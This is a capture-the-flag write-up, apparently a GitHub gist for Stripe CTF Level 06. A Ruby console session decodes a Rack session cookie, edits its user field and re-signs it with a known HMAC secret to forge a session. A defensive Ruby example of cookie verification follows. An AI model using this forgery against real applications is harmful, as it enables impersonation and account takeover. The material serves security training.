@philfreo
Created October 11, 2012 16:45
Stripe CTF Level 06 Session/Cookie Hack
// See https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb
1.9.3p194 :096 > data = "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5
1.9.3p194 :097"> OGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F
1.9.3p194 :098"> TkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy
1.9.3p194 :099"> Zjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5
1.9.3p194 :100"> Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw
1.9.3p194 :101"> YzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx
1.9.3p194 :102"> MDdkMWIiCXVzZXIiDXBoaWxmcmVvIg9jc3JmLnRva2VuIjEzOWRRampaV0s3
1.9.3p194 :103"> VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJYnpNQzlXbDFzPSIPc2Vzc2lvbl9p
1.9.3p194 :104"> ZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4N2FlODRkYTkzZjIyOGI1ZTM0OWZh
1.9.3p194 :105"> ZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==
1.9.3p194 :106"> "
=> "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5\nOGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F\nTkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy\nZjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5\nZjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw\nYzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx\nMDdkMWIiCXVzZXIiDXBoaWxmcmVvIg9jc3JmLnRva2VuIjEzOWRRampaV0s3\nVDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJYnpNQzlXbDFzPSIPc2Vzc2lvbl9p\nZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4N2FlODRkYTkzZjIyOGI1ZTM0OWZh\nZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==\n"
1.9.3p194 :107 > OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
=> "6310248bab6197cf93953a16a9a407f862bce45a"
1.9.3p194 :108 >
1.9.3p194 :117 >
1.9.3p194 :118 > data = Marshal.load(data.unpack('m').first)
=> {"tracking"=>{"HTTP_USER_AGENT"=>"6906a924698f710c8960792ba519ea285ecbed86", "HTTP_ACCEPT_ENCODING"=>"a0bfc876d68fe7aea700da5ea8925abac6f2f794", "HTTP_ACCEPT_LANGUAGE"=>"dd065ed263c67d799f943ab6c39b55c5e008cbb5"}, "csrf"=>"57e34024aba4b0c5a93482cdb3310ef155351c22224b41087f90162cc8107d1b", "user"=>"philfreo", "csrf.token"=>"39dQjjZWK7T4r4VNdTZHBvupvCEvtllfGIbzMC9Wl1s=", "session_id"=>"20b2353b5fd6520b3b4587ae84da93f228b5e349fafd789ddc39888c9970ac1d"}
1.9.3p194 :119 > data['user'] = 'level07-password-holder'
=> "level07-password-holder"
1.9.3p194 :120 > data = [Marshal.dump(data)].pack('m')
=> "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5\nOGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F\nTkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy\nZjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5\nZjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw\nYzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx\nMDdkMWIiCXVzZXJJIhxsZXZlbDA3LXBhc3N3b3JkLWhvbGRlcgY6BkVUIg9j\nc3JmLnRva2VuIjEzOWRRampaV0s3VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJ\nYnpNQzlXbDFzPSIPc2Vzc2lvbl9pZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4\nN2FlODRkYTkzZjIyOGI1ZTM0OWZhZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==\n"
1.9.3p194 :121 > sig = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
=> "992cee0782e5fad2157f777bf27eca32979cb411"
1.9.3p194 :122 >
1.9.3p194 :123 >
1.9.3p194 :124 >
1.9.3p194 :125 > puts data << '--' << sig
BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5
OGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F
TkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy
Zjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5
Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw
YzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx
MDdkMWIiCXVzZXJJIhxsZXZlbDA3LXBhc3N3b3JkLWhvbGRlcgY6BkVUIg9j
c3JmLnRva2VuIjEzOWRRampaV0s3VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJ
YnpNQzlXbDFzPSIPc2Vzc2lvbl9pZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4
N2FlODRkYTkzZjIyOGI1ZTM0OWZhZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==
--992cee0782e5fad2157f777bf27eca32979cb411
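
The receiving side of the data--signature cookie built in the session above, as an added example (not part of the original gist and not Rack's own code). It shows that an edited cookie is rejected unless it is re-signed with the server's secret. SECRET, the helper names and the JSON payload are assumptions made for illustration.

```ruby
require 'openssl'
require 'json'

# Constructed value standing in for the server-side session secret.
SECRET = 'constructed-demo-secret'

def sign(data, secret)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
end

# Same data--signature layout as the session above, but the payload is JSON
# instead of Marshal, so decoding cannot instantiate arbitrary Ruby objects.
def encode_cookie(session, secret)
  data = [JSON.generate(session)].pack('m')
  "#{data}--#{sign(data, secret)}"
end

# Constant-time comparison: a mismatch reveals nothing about its position.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Returns the session hash, or nil when the cookie fails verification.
def decode_cookie(cookie, secret)
  data, _sep, sig = cookie.to_s.rpartition('--')
  return nil if data.empty? || sig.empty?
  return nil unless secure_compare(sign(data, secret), sig)
  JSON.parse(data.unpack1('m'))
rescue JSON::ParserError
  nil
end

# Outcomes for an edited "user" field (all inputs constructed).
def demo_outcomes
  good = encode_cookie({ 'user' => 'philfreo' }, SECRET)
  forged = encode_cookie({ 'user' => 'level07-password-holder' }, 'wrong-guess')
  edited = forged.rpartition('--').first
  {
    untouched: decode_cookie(good, SECRET),
    old_signature: decode_cookie("#{edited}--#{good.rpartition('--').last}", SECRET),
    wrong_key: decode_cookie(forged, SECRET),
    known_key: decode_cookie("#{edited}--#{sign(edited, SECRET)}", SECRET)
  }
end

p demo_outcomes if __FILE__ == $PROGRAM_NAME
```

Only the `known_key` case is accepted, so the session secret is the single control protecting the cookie: keep it out of anything a client can read and rotate it if it is ever disclosed.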